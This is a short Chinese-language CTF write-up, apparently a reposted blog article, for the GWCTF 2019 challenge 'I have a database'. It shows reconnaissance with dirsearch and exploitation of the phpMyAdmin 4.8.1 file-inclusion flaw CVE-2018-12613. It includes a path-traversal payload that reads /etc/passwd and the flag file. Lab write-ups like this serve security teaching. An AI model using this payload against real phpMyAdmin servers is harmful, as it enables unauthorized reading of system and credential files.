phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1

本文主要是介绍phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

打开题目

我们用dirsearch扫描一下后台看看

扫描结果如下

我们访问一下robots.txt看看，提示有phpinfo.php

那我们访问一下phpinfo.php

发现没有任何信息后我们转去看看phpmyadmin看看

成功访问到页面

在这里我们看到phpmyadmin的版本号是4.8.1

我们百度搜索一下看看

我们知道phpmyadmin4.8.1存在远程文件包含漏洞

输入​/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可以看到能够成功执行

那我们尝试一下直接寻找flag

​/index.php?target=db_sql.php%253f/../../../../../../../../flag

直接就得到了flag

知识点：

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

参考：

phpMyAdmin 4.8.1后台文件包含漏洞（CVE-2018-12613）_phpmyadmin cve-2018-12613漏洞获取webshell-CSDN博客

 

这篇关于phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---